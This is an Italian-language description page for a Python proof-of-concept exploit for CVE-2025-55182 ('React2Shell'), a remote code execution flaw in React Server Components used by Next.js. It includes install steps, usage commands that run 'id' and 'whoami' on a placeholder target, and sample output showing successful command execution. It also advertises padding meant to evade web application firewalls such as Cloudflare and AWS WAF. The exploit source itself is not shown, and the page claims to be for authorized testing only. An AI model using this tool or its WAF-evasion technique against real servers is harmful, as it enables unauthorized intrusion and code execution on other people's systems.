
PoC Python per CVE-2025-55182 (React2Shell) RCE in Next.js/React Server Components con padding dinamico di bypass WAF per test di sicurezza autorizzati.
Un exploit proof-of-concept Python pulito e affidabile per CVE-2025-55182 (alias React2Shell), una vulnerabilità critica di esecuzione remota di codice nei React Server Components utilizzati da Next.js (App Router) e framework simili.
Questo PoC include padding dinamico per bypass WAF per eludere i comuni web application firewall (Cloudflare, AWS WAF, ecc.) che limitano l'ispezione approfondita di grandi corpi multipart.
requests librarypip install requests
python poc.py https://vulnerable-target.com "id"
python poc.py https://vulnerable-target.com "whoami" 256
[*] Sending payload to https://vulnerable-target.com with 256KB padding...
[*] Command: id
[+] RCE Successful! Output:
uid=1000(node) gid=1000(node) groups=1000(node),4(adm),27(sudo)
Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e ricerca.